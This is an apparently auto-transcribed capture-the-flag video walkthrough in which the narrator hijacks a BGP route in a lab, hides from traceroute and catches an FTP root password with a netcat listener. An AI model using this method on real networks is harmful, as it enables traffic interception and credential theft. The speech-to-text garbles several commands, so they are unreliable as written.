TraceRoute 10 120 15 10 are now invisible in the hop. So that is the way to become completely invisible when doing this BGP hijack. I'm sure there's other ways to identify it, but I just found that funny. And if you ever want to set like a passive device and do man the middles and not be seen over TraceRoute, you need to increment your TTL by 1 because that just breaks TraceRoute. So let's see. What else can we show? I guess we can restore everything. So restore 2 and show a unintended route. So opt LSLA. Ooh, I deleted the file. I think contab-l. Oh, LXC exec r1 bash opt. Yeah, restore 2. There it is. So this is restoring the config. So if we do v2ish show run, we don't have anything. So we could just start playing with the BGP route. So let's do what we did the very first time and prove that when we only severed this link, that this guy got the advertisement from this guy. So we can do conft IP prefix list, please subscribe, permit 10 120 15 10 0/25. Then we need to do router BGP 100. I think it's 100. Do show run. Yep. Router BGP 100 network 10 120 15 0/25. So now we advertise the route. So if we exit, clear IP BGP stir, give this a few seconds, we should see this guy has the route. So b2ish show IP BGP 10 120 15 0/25 and show IP BGP 10 120 15 0/25. v2ish show IP BGP. So router 3, that is this guy, is showing he has 2 routes to 10 120 15 0/25. One is through 200, 100, so he knows this route, and he also knows directly to 100. So when we blacklisted him, this route went away and was no longer the best route, which left this route. So let's show that. Show run. Actually, before we show that, we can... No, never mind. Sorry for confusion. If I do one thing, it'll make the box a bit more of a pain to revert. So we'll do that at the very end. It's an unintended way to do this box. So conf t, route map to AS300, deny 5. And now we just want to match IP address, prefix, please subscribe, and clear IP BGP star out. And now when we rerun these commands, we can see router 2 hasn't changed. He still knows the direct route to me. But router 3, that one advertisement went away, so 200, 100 is the way to go. So when we did conf t and said route map to AS200, permit 5, and then this line, set community, no export, do clear IP BGP star out. And the reason why I said do here and not before is it because I'm in config mode and was lazy and didn't feel like leaving config mode. So now I can show this route. He still has it. And this guy still has it. He should not have it. Let's see. To AS200, permit 5. Set community, no export. That do command should have worked. Clear IP BGP star out. Ping 10 120 15 10. Oh. Did I do something wrong? Okay, no, he does not. So that do command either took a while to run or just did not. But anyways, we have that 10 120 15 0 route. Doesn't exist. So the guy sends it back to this guy. If you want to, highly recommend playing around with routing on this box because there's a lot of cool things you can do. Final, let's restore the box. Opt restore. BTYSH. If we do show IP BGP 10 120 15 0/25, he's not in any tables because we're not advertising that route. So let's just advertise that route and then we'll change an interface IP. So let's do conf t, IP prefix list, unintended 10 120 15 0/25. Did I screw something up? Let's see. IP prefix list unintended 10 120 15 0/25. Oh, I'm forgetting permit. Permit 10. There we go. So show run. Do show run. Okay, I have that in there. So let's do route map to AS200. No, we want to do router BGP. Router BGP 100. Network 10 120 15 0/25. I don't think I actually had to do that prefix list. So let's do clear IP BGP star out. Okay. So now we have that routing loop. So if we do exit, ping 10 120 15 10, we can't ping because we got the routing loop of us sending it to this guy sending it back to us. So if we go to router 2, we can do show IP BGP 10.120.15.10/25, and he's going to send it directly to us. He never even thinks about sending it to this guy because this guy's advertising 10.1. He's advertising 10.120.15.0/24, which is a larger subnet than /25. So he sends it to us because we got the smaller subnet. And if we wanted to, we go back to our box, if config, and let's just do eth2 10.120.15.10 net mask 255.255.255.0. We could do 128 just so it matches. Not important. And then netcat lvnp 21. So now, when this guy sends us a packet on port 21, our router is going to think, oh, that's a local interface, and he's going to send it to us. At least that's what I believe is going to happen right now. Let's see, if I hit enter, does anything happen? Nope. So I guess we're just waiting. So we got a connection from 1078.10.2, and that said user root, passive, and quit. So if we do this again, and then every time we hit enter, it is FTP logic. But I'm going to hit enter once. And then it should, when it connects, tell us user root. Actually, I'm not going to hit enter once. I'll show this. So start this up, and then while that's going, we'll do FTP raw telnet commands. Maybe this will do it. I just want to see like a packet capture. So he sends user anonymous, server sends 331 back saying anonymous login's okay. Client sees 331 and then sends the password. So keep that in mind. So we got a connection. We hit enter. It sends a packet back. He sends us user root. We hit enter to send a packet back again. He sends us passive. We hit enter. He does quit and exits. So if we just do nclvnp 21, and this time when he says user root, we're going to say 331, and he'll respond back with his password. The other way is just creating a Python program and running an FTP server and logging, but I find this way a bit cooler. So he connected to us, hit enter, he says user root. We're going to send this time a packet back with 331. Please subscribe, comment, and share this video. And he's going to send the password back as BGP telco routing. If we went back, I don't have Wireshark, we could send the rest of it and he'd send everything. So we can just copy this and now we got the password. So let's see. Exit one of these boxes. There we go. Here's all the FTP commands he does. Open, user, put secret data. If we cat secret data, I don't know what it is. It's just hex. So it probably means nothing. So it's probably just a file he can put. So do contab-l. He is running those commands every minute. So hope you guys enjoyed the video. Take care, and I will see you all next week.